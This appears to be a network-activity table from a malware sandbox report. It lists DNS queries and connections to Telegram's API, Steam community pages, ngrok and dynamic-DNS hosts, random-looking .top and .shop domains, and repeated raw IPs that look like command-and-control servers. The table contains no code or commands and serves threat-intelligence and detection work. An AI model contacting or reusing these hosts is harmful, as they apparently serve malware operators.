| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| RU | 176.113.115.163:80 | 176.113.115.163 | tcp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.115.113.176.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| BG | 87.120.125.214:443 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| VN | 14.243.221.170:2654 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | 23.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| RU | 185.215.113.67:15206 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 141.233.202.91.in-addr.arpa | udp |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| SE | 193.233.255.106:69 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| DE | 209.38.221.184:8080 | 209.38.221.184 | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | 21.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.221.38.209.in-addr.arpa | udp |
| DE | 46.235.26.83:8080 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.117:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | tacitglibbr.biz | udp |
| US | 172.67.164.37:443 | tacitglibbr.biz | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | immureprech.biz | udp |
| US | 104.21.22.222:443 | immureprech.biz | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 37.164.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.22.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | deafeninggeh.biz | udp |
| US | 104.21.32.1:443 | deafeninggeh.biz | tcp |
| US | 8.8.8.8:53 | effecterectz.xyz | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | diffuculttan.xyz | udp |
| US | 8.8.8.8:53 | debonairnukk.xyz | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | wrathful-jammy.cyou | udp |
| US | 172.67.206.53:443 | wrathful-jammy.cyou | tcp |
| US | 8.8.8.8:53 | 1.32.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.206.67.172.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | awake-weaves.cyou | udp |
| US | 172.67.143.116:443 | awake-weaves.cyou | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | sordid-snaked.cyou | udp |
| US | 8.8.8.8:53 | 116.143.67.172.in-addr.arpa | udp |
| US | 104.21.27.63:443 | sordid-snaked.cyou | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| RU | 185.215.113.67:21405 | tcp | |
| US | 8.8.8.8:53 | 63.27.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 108.209.109.20.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| PL | 45.80.158.31:80 | tcp | |
| PL | 45.80.158.31:80 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| IR | 5.134.199.85:40500 | udp | |
| YE | 94.26.219.44:40500 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 85.199.134.5.in-addr.arpa | udp |
| US | 192.210.150.26:8787 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | jirafasaltas.fun | udp |
| US | 104.21.57.227:443 | jirafasaltas.fun | tcp |
| US | 8.8.8.8:53 | 227.57.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| MX | 189.252.61.8:40500 | udp | |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 192.210.150.26:8787 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 8.61.252.189.in-addr.arpa | udp |
| VN | 14.243.221.170:2654 | tcp | |
| US | 8.8.8.8:53 | cowod.hopto.org | udp |
| US | 20.83.148.22:80 | tcp | |
| DE | 147.28.185.29:80 | 147.28.185.29 | tcp |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| US | 192.210.150.26:8787 | tcp | |
| NL | 206.166.251.4:8080 | tcp | |
| US | 8.8.8.8:53 | 29.185.28.147.in-addr.arpa | udp |
| KZ | 92.47.52.79:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 79.52.47.92.in-addr.arpa | udp |
| RU | 185.215.113.67:15206 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | twizthash.net | udp |
| RU | 185.215.113.66:5152 | twizthash.net | tcp |
| IR | 2.177.40.206:40500 | udp | |
| SE | 193.233.255.106:69 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| FI | 95.217.25.228:443 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 227.95.123.104.in-addr.arpa | udp |
| PL | 45.80.158.31:80 | tcp | |
| PL | 45.80.158.31:80 | tcp | |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| RU | 45.150.24.42:40500 | udp | |
| US | 8.8.8.8:53 | 42.24.150.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lsks.volamngayxua.net | udp |
| VN | 103.200.23.247:80 | lsks.volamngayxua.net | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | 247.23.200.103.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| IR | 5.239.109.92:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 2.191.61.218:40500 | tcp | |
| US | 8.8.8.8:53 | 92.109.239.5.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 36.113.215.185.in-addr.arpa | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 38.180.203.11:1010 | tcp | |
| SY | 82.137.239.235:40500 | udp | |
| US | 8.8.8.8:53 | 235.239.137.82.in-addr.arpa | udp |
| RU | 185.215.113.36:80 | 185.215.113.36 | tcp |
| VN | 14.243.221.170:2654 | tcp | |
| FR | 51.159.4.50:8080 | 51.159.4.50 | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 20.83.148.22:80 | tcp | |
| SE | 151.177.61.79:4782 | tcp | |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| IR | 217.171.148.45:40500 | udp | |
| US | 8.8.8.8:53 | 45.148.171.217.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| RU | 185.215.113.67:15206 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| KZ | 92.46.40.130:40500 | udp | |
| FI | 95.217.25.228:443 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| N/A | 192.168.190.133:4444 | tcp | |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| NL | 62.60.217.159:15666 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| IN | 116.206.151.203:478 | 116.206.151.203 | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| SE | 193.233.255.106:69 | tcp | |
| KZ | 213.211.105.70:40500 | udp | |
| US | 8.8.8.8:53 | 203.151.206.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.105.211.213.in-addr.arpa | udp |
| PL | 45.80.158.31:80 | tcp | |
| RU | 185.215.113.66:80 | twizthash.net | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| MX | 189.136.17.247:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 247.17.136.189.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| IR | 94.183.35.46:40500 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| IR | 78.38.29.237:40500 | udp | |
| US | 8.8.8.8:53 | 237.29.38.78.in-addr.arpa | udp |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| VN | 14.243.221.170:2654 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| GB | 38.180.203.11:1010 | tcp | |
| RU | 185.215.113.66:5152 | twizthash.net | tcp |
| SE | 151.177.61.79:4782 | tcp | |
| US | 8.8.8.8:53 | www.pornhub.com | udp |
| US | 66.254.114.41:443 | www.pornhub.com | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.trafficjunky.com | udp |
| US | 8.8.8.8:53 | ei.phncdn.com | udp |
| GB | 64.210.156.23:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.23:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| GB | 64.210.156.17:443 | ei.phncdn.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 206.217.142.166:1234 | tcp | |
| US | 8.8.8.8:53 | 41.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | media.trafficjunky.net | udp |
| US | 8.8.8.8:53 | cdn1-smallimg.phncdn.com | udp |
| US | 66.254.114.156:443 | cdn1-smallimg.phncdn.com | tcp |
| GB | 64.210.156.22:443 | media.trafficjunky.net | tcp |
| GB | 64.210.156.17:443 | media.trafficjunky.net | tcp |
| US | 8.8.8.8:53 | 156.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.201.250.142.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | ss.phncdn.com | udp |
| US | 8.8.8.8:53 | a.adtng.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| US | 66.254.114.171:443 | a.adtng.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | ht-cdn2.adtng.com | udp |
| GB | 64.210.156.16:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.16:443 | ht-cdn2.adtng.com | tcp |
| GB | 64.210.156.16:443 | ht-cdn2.adtng.com | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | hw-cdn2.adtng.com | udp |
| GB | 64.210.156.0:443 | hw-cdn2.adtng.com | tcp |
| YE | 134.35.128.189:40500 | udp | |
| US | 8.8.8.8:53 | 171.114.254.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.156.210.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.128.35.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | storage.googleapis.com | udp |
| FR | 142.250.74.251:443 | storage.googleapis.com | tcp |
| US | 8.8.8.8:53 | 251.74.250.142.in-addr.arpa | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| FI | 95.217.25.228:443 | tcp | |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.67:15206 | tcp | |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| KZ | 95.59.234.182:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 182.234.59.95.in-addr.arpa | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 8.8.8.8:53 | safe.ywxww.net | udp |
| IR | 95.81.102.72:40500 | udp | |
| US | 8.8.8.8:53 | 72.102.81.95.in-addr.arpa | udp |
| CN | 60.191.236.246:820 | safe.ywxww.net | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 192.210.150.26:8787 | tcp | |
| PL | 45.80.158.31:80 | tcp | |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| UZ | 90.156.164.103:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | 103.164.156.90.in-addr.arpa | udp |
| SE | 193.233.255.106:69 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| PK | 182.188.65.58:40500 | tcp | |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| MX | 189.141.139.39:40500 | udp | |
| US | 8.8.8.8:53 | 39.139.141.189.in-addr.arpa | udp |
| VN | 14.243.221.170:2654 | tcp | |
| SE | 151.177.61.79:4782 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| GB | 38.180.203.11:1010 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 192.210.150.26:8787 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 20.83.148.22:80 | tcp | |
| UZ | 90.156.160.56:40500 | udp | |
| US | 8.8.8.8:53 | 56.160.156.90.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| UZ | 92.38.19.10:40500 | udp | |
| US | 8.8.8.8:53 | 10.19.38.92.in-addr.arpa | udp |
| RU | 185.215.113.67:15206 | tcp | |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | t.0000o.xyz | udp |
| US | 199.195.251.23:88 | t.0000o.xyz | tcp |
| US | 8.8.8.8:53 | 23.251.195.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aefieiaehfiaehr.top | udp |
| RU | 185.215.113.66:80 | aefieiaehfiaehr.top | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| SE | 151.177.61.79:4782 | tcp | |
| VN | 14.243.221.170:2654 | tcp | |
| SY | 82.137.239.235:40500 | tcp | |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| AO | 102.215.170.62:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 8.8.8.8:53 | 62.170.215.102.in-addr.arpa | udp |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| GB | 38.180.203.11:1010 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| SE | 193.233.255.106:69 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| UZ | 213.230.99.119:40500 | udp | |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| PL | 45.80.158.31:80 | tcp | |
| RU | 188.119.66.185:443 | tcp | |
| US | 8.8.8.8:53 | 208.242.5.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.99.230.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.66.119.188.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| IR | 185.80.102.252:40500 | udp | |
| NL | 31.214.157.206:2024 | tcp | |
| US | 8.8.8.8:53 | 252.102.80.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.157.214.31.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| AO | 154.71.224.9:40500 | udp | |
| RU | 185.215.113.67:15206 | tcp | |
| US | 8.8.8.8:53 | 9.224.71.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| US | 20.83.148.22:80 | tcp | |
| IR | 93.118.127.143:40500 | udp | |
| VN | 14.243.221.170:2654 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | 143.127.118.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| US | 192.210.150.26:8787 | tcp | |
| RU | 31.8.228.20:40500 | udp | |
| US | 8.8.8.8:53 | 20.228.8.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| SE | 151.177.61.79:4782 | tcp | |
| IR | 2.176.92.74:40500 | tcp | |
| IR | 2.179.117.33:40500 | udp | |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| SE | 193.233.255.106:69 | tcp | |
| US | 8.8.8.8:53 | 33.117.179.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aquafusion.com.co | udp |
| CO | 190.90.160.170:443 | aquafusion.com.co | tcp |
| RU | 185.215.113.67:21405 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| PL | 45.80.158.31:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| FI | 95.217.25.228:443 | tcp | |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| TR | 163.5.242.208:80 | 163.5.242.208 | tcp |
| UZ | 62.209.135.143:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| GB | 38.180.203.11:1010 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | 143.135.209.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| RU | 212.3.146.135:40500 | udp | |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| US | 8.8.8.8:53 | 135.146.3.212.in-addr.arpa | udp |
| RU | 185.215.113.67:15206 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| VN | 14.243.221.170:2654 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| IN | 59.91.192.115:40500 | udp | |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 8.8.8.8:53 | 115.192.91.59.in-addr.arpa | udp |
| US | 192.210.150.26:8787 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| NL | 62.60.217.159:15666 | tcp | |
| SE | 151.177.61.79:4782 | tcp | |
| US | 8.8.8.8:53 | 12.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 192.210.150.26:8787 | tcp | |
| KZ | 31.171.187.236:40500 | udp | |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| FI | 95.217.25.228:443 | tcp | |
| US | 8.8.8.8:53 | 236.187.171.31.in-addr.arpa | udp |
| YE | 46.35.80.190:40500 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.67:21405 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| PL | 45.80.158.31:80 | tcp | |
| BG | 87.120.125.214:443 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| IR | 2.189.31.47:40500 | udp | |
| GB | 38.180.203.11:1010 | tcp | |
| US | 8.8.8.8:53 | 47.31.189.2.in-addr.arpa | udp |
| SE | 193.233.255.106:69 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.66:80 | aefieiaehfiaehr.top | tcp |
| BG | 87.120.125.214:443 | tcp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| KZ | 82.200.228.118:40500 | udp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | aeufoeahfouefhg.top | udp |
| US | 8.8.8.8:53 | 118.228.200.82.in-addr.arpa | udp |
| US | 147.185.221.23:1121 | tcp | |
| RU | 185.215.113.66:80 | aeufoeahfouefhg.top | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | racedsuitreow.shop | udp |
| US | 8.8.8.8:53 | pirati.privatedns.org | udp |
| US | 8.8.8.8:53 | defenddsouneuw.shop | udp |
| IT | 87.6.220.118:80 | pirati.privatedns.org | tcp |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 8.8.8.8:53 | deallyharvenw.shop | udp |
| US | 8.8.8.8:53 | priooozekw.shop | udp |
| US | 8.8.8.8:53 | 22.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pumpkinkwquo.shop | udp |
| US | 8.8.8.8:53 | abortinoiwiam.shop | udp |
| RU | 185.215.113.67:15206 | tcp | |
| US | 8.8.8.8:53 | surroundeocw.shop | udp |
| US | 8.8.8.8:53 | 118.220.6.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | covvercilverow.shop | udp |
| VN | 14.243.221.170:2654 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 254.238.217.23.in-addr.arpa | udp |
| UZ | 90.156.160.66:40500 | udp | |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | 66.160.156.90.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
| US | 20.83.148.22:80 | tcp | |
| BG | 87.120.125.214:443 | tcp | |
| RU | 188.119.66.185:443 | tcp | |
| US | 8.8.8.8:53 | 0.tcp.eu.ngrok.io | udp |
| DE | 18.192.31.30:15174 | 0.tcp.eu.ngrok.io | tcp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| NL | 31.214.157.206:2024 | tcp | |
| US | 8.8.8.8:53 | 30.31.192.18.in-addr.arpa | udp |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | fivexc5pt.top | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| KZ | 37.151.156.118:40500 | udp | |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | 118.156.151.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 18.192.31.30:15174 | 0.tcp.eu.ngrok.io | tcp |
| SE | 151.177.61.79:4782 | tcp | |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| US | 192.210.150.26:8787 | tcp | |
| US | 8.8.8.8:53 | fivexc5sr.top | udp |
